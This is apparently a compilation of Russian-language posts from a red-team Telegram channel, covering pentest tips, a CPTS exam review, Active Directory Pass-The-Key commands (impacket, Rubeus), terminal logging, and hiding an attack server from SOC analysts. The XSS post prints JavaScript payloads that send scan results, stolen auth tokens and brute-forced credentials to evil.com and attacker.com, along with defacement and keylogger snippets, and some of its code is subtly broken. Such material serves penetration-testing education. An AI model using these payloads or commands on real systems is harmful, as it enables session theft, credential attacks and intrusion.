🔥 Привет! Когда-нибудь настанет момент, когда появится задача по брутфорсу чего-либо на срок, сильно превышающий несколько часов, и было бы круто автоматизировать запуск, мониторинг и конечный просмотр атаки.

Можно ли сделать телеграм-бота без использования специализированных фреймворков и навыков программирования?

Конечно можно. 🔗 Вот пример прямого обращения к API, используя curl

Тут присутствует задержка между спреями для избежания блокировки, и время сна, на случай, если что-то положится, то хотя бы не ночью. И конечно же подключён бот, буквально двумя строками кода

#redteam

Привет, друзья! 👋

Принёс вам историю из реальных кейсов по пентесту — всё как вы любите: взломы, стрельба, горящие админы. 🔥 Готовьте попкорн, потому что будет жарко! 😎

Всем приятного чтения, а я дальше пойду добивать свой отпуск! 🏖️

Ссылочка на статью: https://shankdy.notion.site/112cfaa22e1e8017a274c546dee209d5

#redteam

🎆 Привет!

Нежданно-негаданно приехала новая часть постов про антивирусы.
Это третья часть из серии постов про мой опыт изучения работы антивирусных средств и EDR. В ней была проведена работа над ошибками предыдущих частей и далее рассказано и показано про работу meterpreter и msfvenom.

Ссылка: 🔗 Тык

Основная её цель - показать, что у метерпретера, и метасплоита существует 👀 исходный код и официальная документация , на что стоит обращать внимание при изучении их работы.

Приятного чтения!

#redteam

« Всё это было только ради поста ( @pyfffe ) »

💥 Привет! А я тут 🔗 налутал HTB CPTS и спешу поделиться мыслями и лайфхаками по этому сертификату. Для начала несколько вступительных слов.

❓ Что там за задание?
Дан лабораторный стенд с эмуляцией инфраструктуры небольшой компании, с линуксами и виндовсоми. Цель — взломать и написать отчёт по проведению пентеста. Присутствует возможность полной перезагрузки стенда.

❓ Какие ограничения?
Дедлайн — 10 дней включительно (также входит одна попытка на пересдачу). В инструментах не ограничивают. Прокторинга нет. Шаблон для отчета дадут.

Теперь лайфхаки:

*️⃣ Во первых очень важно спланировать свое время. Может показаться, что 10 дней — это много, но в моём случае потребовалось тратить по 8-10 часов в день. Если же у вас нет столько свободного времени, можно использовать еще 10 дней из попытки пересдачи. Также выделите несколько дней на оформление отчета.

*️⃣ Перед началом сдачи подготовьте рабочее пространство. Убедитесь, что у вас работает то, о чем говорить нельзя, и сетевой VPN трафик до стенда не блокируется. Если его всё-таки блокируют, то есть два выхода:
1️⃣Первый - использовать предоставленный для сдачи экзамена Pwnbox (выделенную виртуальную машину с ParrotOS), но у него два основных минуса - это подключение по VNC через браузер, без возможности ctrl+c ctrl+v, и ограниченное время работы, из-за чего приходится перезапускать виртуалку. В общем, это не мой путь 💀
2️⃣Второй выход - это арендовать VPS, с которого будет работать OpenVPN к лабе, и работать через него. Больше гемора с настройкой, но удобнее и реалистичнее

*️⃣ Вы единственный пользователь стенда, а значит ничего не мешяет добавить туда такие вектора атак, которые неприменимы для обычных HTB-Коробок.

*️⃣ В отчете нужно будет показать все шаги компрометации так, чтобы это смогла повторить бабушка админа, поэтому логируйте каждый шаг взлома, Включая, к примеру, mimicatz.exe lsadump::sam и sharphound.exe -c All.

*️⃣ Лаба несложная, zero-day нет, Вся информация есть либо на HTB Academy, либо в гугле. Однако, тут много кроличьих нор, из-за чего необходимо досконально проверять каждый предположительный вектор атаки.

Ну вот вроде всё. У меня сдача заняла 9 дней, отчет проверяли 5 рабочих дней. Результатом доволен 👾

#redteam

Привет, друзья! 😻

Немного дружественного контента. Сегодня в 20:00 наш хороший товарищ и коллега Владимир Кочанов, с которым мы не раз обсуждали безопасность бизнеса, в том числе в рамках информационной безопасности, проведет стрим на тему: «Как понять, что пора создавать службу безопасности?»

Владимир поделится опытом и ответит на важные вопросы:

🔸 На каком этапе развития компании становится критично задуматься о безопасности?
🔸 Как донести до акционеров, что безопасность — это инвестиция, а не пустая трата?

Если думаете, как провести вечер, — рекомендуем присоединиться! 👍

🔗 Ссылка на стрим: https://t.me/sbprobiz?livestream

👨‍💻 Привет! В последнее время я все чаще наблюдаю в пентестах и багбаунти сдачу XSS-уязвимостей без подробного описания импакта от этой уязвимости, как будто достаточно показать, что отрабатывает функция alert и всплывает popup-окно с тестом “я хакер”. А при благоприятных условиях даже перехватить свою куку. Как следствие, такие репорты могут пометить низким приоритетом и закинуть в долгий ящик.

Я хочу осветить несколько необычных векторов атак, которые можно использовать при различных инъекциях в веб-страницу, помимо кражи сессии из кук.

1️⃣ Сначала база - CSRF. если на сайте с XSS присутствуют незащищённые аутентифицированные запросы, можно совершить их от имени пользователя. Также никто не запрещает помимо целевого ресурса бегать по внутренней сети пользователя. Вот пример сканера открытого порта 80 внутренней сети

async function checkPort(ip) {
  try {
    const controller = new AbortController();
    const timeout = setTimeout(() => controller.abort(), 2000); // Таймаут 2 секунды

    const response = await fetch(`http://${ip}`, {
      method: 'HEAD',
      signal: controller.signal
    });
    clearTimeout(timeout);

    if (response.ok) {
      fetch(`https://evil.com/open?ip=${ip}`);
    }
  } catch (e) {
  }
}

async function scanNetwork(startIP, endIP) {
  const start = "192.168.1."

  for (let octet= 1; octet<= 254; ipNum++) {
    const ip = start + String(octet)
    checkPort(ip); // Проверяем каждый IP
  }
}

// Запуск сканера
scanNetwork(startIP, endIP);

2️⃣ Если вместо куки сессия хранится в local/session storage и передается через заголовок Authorization, то при неправильной настройке CSP её тоже можно перехватить

fetch("https://evil.com/steal", {
  method: "POST",
  headers: {
    "Authorization": localStorage.getItem("authToken"),
  },
});

3️⃣ XSS - это инъекция кода, а значит можно использовать вычислительные ресурсы. Я видел вектор распределенной брутфорс-атаки, что-то наподобие ботнета. Как пример, при загрузке скрипта жертва получает список хостов, логинов и паролей и начинает их брутить из своего браузера.

 const attackServer = "https://attacker.com/report";
 // Список паролей можно подгрузить запросом к сайту злоумышленника
 const passwords = ["password123", "admin", "123456", "qwerty"];
  
  passwords.forEach(password => {
    fetch("https://mail.google.com/login", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        username: "admin", 
        password: password
      })
    })
    .then(response => {
      // Отправляем найденные креды
      if (response.status === 200) {
        fetch(attackServer, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ username: "admin", password: password })
        });
      }
    });
  });

<продолжение далее>

<продолжение>

4️⃣ Если обнаружена хранимая XSS где-то на главной странице, то можно сделать дефейс, то есть изменить содержание страницы и добавить лозунги про квадроберов, или просто сделать страницу нефункциональной:

<script>document.body.innerHTML="<h1>Этот сайт был взломан. Все данные пользователей скомпрометированы</h1>";</script>

5️⃣ Помимо дефейса можно внедрить свои рекламные баннеры. Такой вектор обычно используется вирусами на скомпрометированном компьютере пользователя, но можно и через HTML-Injection:

<div id="ad" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: white; z-index: 1000; display: flex; justify-content: center; align-items: center;">
  <div style="position: relative; background: #f9f9f9; padding: 20px; border: 1px solid #ccc; box-shadow: 0 0 10px rgba(0,0,0,0.2);">
    <div style="position: absolute; top: -10px; right: -10px; cursor: pointer;" onclick="document.getElementById('ad').remove();">❌</div>
    <h3>Special Offer!</h3>
    <p>Click below to learn more:</p>
    <a href="https://example.com" target="_blank">Learn More</a>
  </div>
</div>

6️⃣ Кейлоггер. Да, это тоже можно сделать, причем очень просто, через встроенный ивент onkeypress:

<script>
    var l = "";
    document.onkeypress = function (e) {
        l + e.key;
        console.log(l); // Можно отправлять каждый введенный символ на наш сервер
    }
</script>

Как-то так 👀
Цель этого поста — показать, что, несмотря на эволюцию браузеров за последние 10 лет, XSS-уязвимости всё еще могут наносить серьезный импакт.

#redteam

🎆 Привет!

Хотим рассказать про канал наших друзей (да, у нас такие есть) и коллег по цеху. Там вы найдете заметки про Ред и Блю тим, и в целом про техническую ИБ.

Приглашаем в RedBlue Notes

❤️ С Международным днём защиты информации! 🤩

В мире безопасности есть свои "синие" — те, кто держит защиту под контролем, "красные" — те, кто не даёт им расслабляться, "фиолетовые" — те, кто объединяет усилия первых двух, и даже "жёлтые" — всегда готовые внести свежие идеи и нестандартные подходы к безопасности. Это не просто работа, а целая палитра усилий, где каждый цвет добавляет что-то важное🥰. А Вместе мы создаём настоящую картину безопасности!

Пусть инструменты работают,
идеи сверкают, а времени на отдых всегда хватает. Спасибо всем, кто делает этот цифровой мир ярче и безопаснее! 🛡

#REDtalk

Всем привет! 😎

Часто слышу вопрос:

С чего начать путь в ИБ?

Друзья, ну очевидно же, что любому уважающему себя хацкеру надо начинать со взлома Пентагона😄! Но если без шуток, то начинать стоит с хорошей базы. Разберитесь, как устроены сети и ваши любимые тырнетики.

А чтобы не блуждать в потёмках и не хвататься за все подряд, делюсь с вами отличным ресурсом. Он подойдет как новичкам для старта, так и опытным специалистам для закрытия пробелов в знаниях:

🔗 Roadmap Cyber Security

На этом сайте вы найдете дорожную карту для специалистов по кибербезопасности, которая охватывает всё:

💻 Основы сетевых технологий

🛡 Криптографию

⌨️ Pentest

🖥 Методы защиты инфраструктуры и многое другое.

Ресурс обновлен для 2024 года, поэтому всё достаточно актуально и полезно.

Исследуйте, учитесь и уверенно двигайтесь вперед! Успехов на вашем пути! 💪

#blueteam #redteam

👨‍💻 Привет!

Представим ситуацию — Вы сидите, проводите пентест, и в какой-то момент к вам приходит злой заказчик и говорит, что вы положили его инфру. Вы опешили, всё отрицаете, ведь во время тестирования атаки не было деструктивных методов. Но заказчик всё не успокаивается, показывает логи, мол, вот, в это время на нас упало куча трафика.

И в этот момент очень пригодились бы логи всех действий во время проведения тестирования. Поэтому вот простой лайфхак, который автоматически будет записывать 90% действий и поможет понять, были ли пентестеры причастны к инциденту или нет.

1️⃣ Для начала стоит добавить дату и время при каждом выполнении команды в терминале. Для этого можно модифицировать промпт вашего командного интерпретатора.

Тут ничего сложного, открываем rc файл и меняем соотсутсвующую переменную.

zsh (kali linux): Заменить PROMPT в ~/.zsh_rc

PROMPT=$'%F{%(#.blue.green)}┌──%{$fg[yellow]%}[%D{%d.%m.%y} %D{%H:%M}]\n%F{%(#.blue.green)}├──${debian_chroot:+($debian_chroot)─}${VIRTUAL_ENV:+($(basename $VIRTUAL_ENV))─}(%B%F{%(#.red.blue)}%n'$prompt_symbol$'%m%b%F{%(#.blue.green)})-[%B%F{reset}%(6~.%-1~/…/%4~.%5~)%b%F{%(#.blue.green)}]\n└─%B%(#.%F{red}#.%F{blue}$)%b%F{reset} ' 

bash (kali linux): Заменить PS1 в ~/.bash_rc

PS1=$prompt_color'┌──[\D{%d.%m.%Y %H:%M}]\n'$prompt_color'├──${debian_chroot:+($debian_chroot)──}${VIRTUAL_ENV:+(\[\033[0;1m\]$(basename $VIRTUAL_ENV)'$prompt_color')}('$info_color'\u'$prompt_symbol'\h'$prompt_color')-[\[\033[0;1m\]\w'$prompt_color']\n'$prompt_color'└─'$info_color'\$\[\033[0m\] ';; 

Теперь в листинге каждая команда будет иметь дату и время начала и конца выполнения (как на скриншоте к посту)

2️⃣ Далее нужно настроить автоматическую запись листинга. Тут на помощь придет TMUX. Правильно настроенный терминальный мультиплексор может стать мощным инструментом по сравнению с ГУИшными терминалами.

Для записи истории команд нужно установить плагин и добавить конфигурацию при каждом запуске tmux.

$> git clone https://github.com/tmux-plugins/tpm ~/.tmux/plugins/tpm 
 
# Конфиг должен выглядить так 
$> cat .tmux.conf  
 
# Список плагинов 
set -g @plugin 'tmux-plugins/tpm' 
set -g @plugin 'tmux-plugins/tmux-sensible' 
set -g @plugin 'tmux-plugins/tmux-logging' 
set -g history-limit 500000 
 
# Запуск Tmux Plugin Manager 
run '~/.tmux/plugins/tpm/tpm' 
 
$> tmux source ~/.tmux.conf 

Осталось зайти в tmux и нажать CTRL + b и SHIFT + i. Теперь при каждом запуске tmux можно начать запись с помощью CTRL + b, SHIFT + p и сразу после выхода из терминала запись будет сохранена в домашнюю директорию в виде текстового файла.

Теперь мы точно будем уверены, что во время инцидента со стороны пентестеров активности не было и мы не в чем не виноваты. Конечно, листинг команд работает только для CLI. С GUI нужно разбираться отдельно.

#redteam #ToolTricks

Привет, друзья! 🤩

У нас для вас крутая новость🚀! Сегодня в 20:00 наш хороший товарищ Владимир Кочанов проведет стрим на тему: «Руководитель — как им стать?»

Вас ждёт разбор актуальных и интересных вопросов:

❕ Какие софт скиллы нужны, чтобы стать успешным руководителем?

❕ Как найти общий язык с коллегами разных поколений?

❕ Отличаются ли подходы к управлению в разных отделах?

❕ Что делает функцию СБ (службы безопасности) особенной?

Если хотите провести вечер с пользой — присоединяйтесь 🔥! Будет интересно и полезно для всех, кто стремится к развитию и лидерству.

👉 Ссылка на стрим: https://t.me/sbprobiz?livestream

Сегодня вспомним о защите...
А точнее о Protected Users, вспомним в контексте пентеста конечно😎
Ну и не забудем про PTK (ай, спойлеры😐)

Обычно, когда в ходе пентеста мы видим УЗ с одинаковыми (похожими) ФИО, но разными правами в домене (особенно, если вторая УЗ - админ домена), первое, что приходит в голову: сейчас реюзнем пароль и заовним эти ваши актив директори🙏
Довольные идём в netexec, делаем Pass-The-Hash и получаем STATUS_ACCOUNT_RESTRICTION 😐

Как все было легко, если бы не Protected Users👀
В чем соль защиты:
▪️Учетные данные защищенных пользователей не будут кэшироваться (да, дамп LSASS вам больше не поможет).
▪️Для защищенных пользователей аутентификация Kerberos не будет генерировать ключи DES или RC4, а также не будет кэшировать текстовые учетные данные или долгосрочные ключи после первоначального получения Ticket-Granting Ticket (TGT) (да, с использованием NTLM тикет не запросить).
▪️NTLM и одноразовая функция NTLM (NTOWF) заблокированы (*грустный вздох*).

Контра: использование AES ключа и Pass-The-Key.🎸
Да, придется делать эскалацию в домене и при помощи, например, УЗ с DCsync получать ключик админа домена с домен контроллера👀

Обещанная напоминашка по PTK😶:
Pass The Key (PTK) предназначена для сред, в которых традиционный протокол NTLM ограничен, а приоритет отдается аутентификации Kerberos. Эта атака использует NTLM-хэш (в нашей ситуации не подходит) или AES-ключи (то, что нужно) пользователя для получения билетов Kerberos, что позволяет получить несанкционированный доступ к ресурсам в сети.

Команда для линуха:

impacket-getTGT DOMAIN/username -aesKey KEY

Команда для винды:

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

Как-то так, защищайте своих админов домена, но мы все равно придём за ними 😒

#redteam

🎄 С наступающим 2025 годом от команды REDtalk! 🎉

Друзья, год подходит к концу, и мы хотим искренне поблагодарить каждого из вас за поддержку, активное участие и интерес к теме информационной безопасности! Вы вдохновляете нас делиться знаниями и вместе строить сообщество профессионалов, где каждый может узнать новое, обсудить идеи и обменяться опытом. 🥰

В 2025 году команда REDtalk готовит для вас ещё больше полезного контента. Давайте вместе продолжать расти, учиться и вдохновляться! 🚀

Желаем вам в новом году профессиональных побед, надёжной защиты, захватывающих проектов и, конечно, личного счастья, здоровья и новых ярких впечатлений! Пусть 2025 год станет временем новых возможностей и достижений! 🥂

Спасибо, что вы с нами. Оставайтесь на связи — впереди только лучшее!

С Новым годом! 🎆
Ваша команда REDtalk ❤️

#REDtalk

👨‍💻 Привет!

Всё в порядке, мы живы. Начинаем вкатываться в новый год.

Допустим у нас есть внешний сервер для проведения пентестов, редтимов и всего этого, и мы хотим его спрятать от посторонних глаз ботов и сок-аналитиков. Звучит просто, но что, если на сервере висит открытый порт? Как с ним быть?

1️⃣ Начну с пинга. По умолчанию популярные linux-дистрибутивы имеют службу, отвечающую за обработку ICMP-пакетов.
Убрать это просто. Достаточно добавить правило блокировки пакетов в межсетевой экран

nft add rule inet filter input icmp type echo-request drop  

2️⃣ Порты. Нужно постоянно держать в голове, что 24/7 по нашему серверу бегают боты и сканеры.

Для начала на всякий случай стоит добавить правила на дроп всех соединений. VPS-провайдеры любят вместе с дистрибутивом ставить какой-нибудь агент заббикса. В этом случае лучше написать правила на блокировку всего трафика и потом по мере необходимости добавлять белые списки:

# Очистка текущих правил 
sudo nft flush ruleset

# Создание таблицы и цепочек 
nft add table inet filter 
nft add chain inet filter input { type filter hook input priority 0; policy drop; } 
nft add chain inet filter output { type filter hook output priority 0; policy drop; } 
nft add chain inet filter forward { type filter hook forward priority 0; policy drop; }

# Исключение для lo  
nft add rule inet filter input iif lo accept 
nft add rule inet filter output oif lo accept

# Разрешение трафика для 22/tcp порта 
nft add rule inet filter input ct state established,related accept 
nft add rule inet filter output ct state established,related accept 
nft add rule inet filter input tcp dport 22 ct state new accept 
nft add rule inet filter output tcp sport 22 accept 
nft list ruleset > /etc/nftables.conf 
 

Для скрытия открытого порта достаточно переместить его на нестандартный (например, tcp/64022 вместо tcp/22). Это можно сделать, не изменяя конфигурацию сервиса, на котором открыт сокет:

nft add chain ip nat prerouting { type nat hook prerouting priority 0; } nft add chain ip nat postrouting { type nat hook postrouting priority 100; } 
nft add rule ip nat prerouting tcp dport 64022 dnat to :22

Или, если не хочется возится с правилами, можно использовать socat:

socat TCP-LISTEN:64022,fork TCP:localhost:22 

Но можно сделать еще лучше — фильтровать соединения от всех IP-адресов, которые не выполнили заданные условия. Я сделал для этого небольшой 🔗 PoC (гифка оттуда), использующий nftables для фильтрации и временной разблокировки конкретного адреса ко всем портам, если с него поступил HTTP-запрос. Есть также 🔗 похожее популярное решение . Таким образом боты и аналитики soc не смогут увидеть открытый порт, так как не придет TCP SYN+ACK пакет.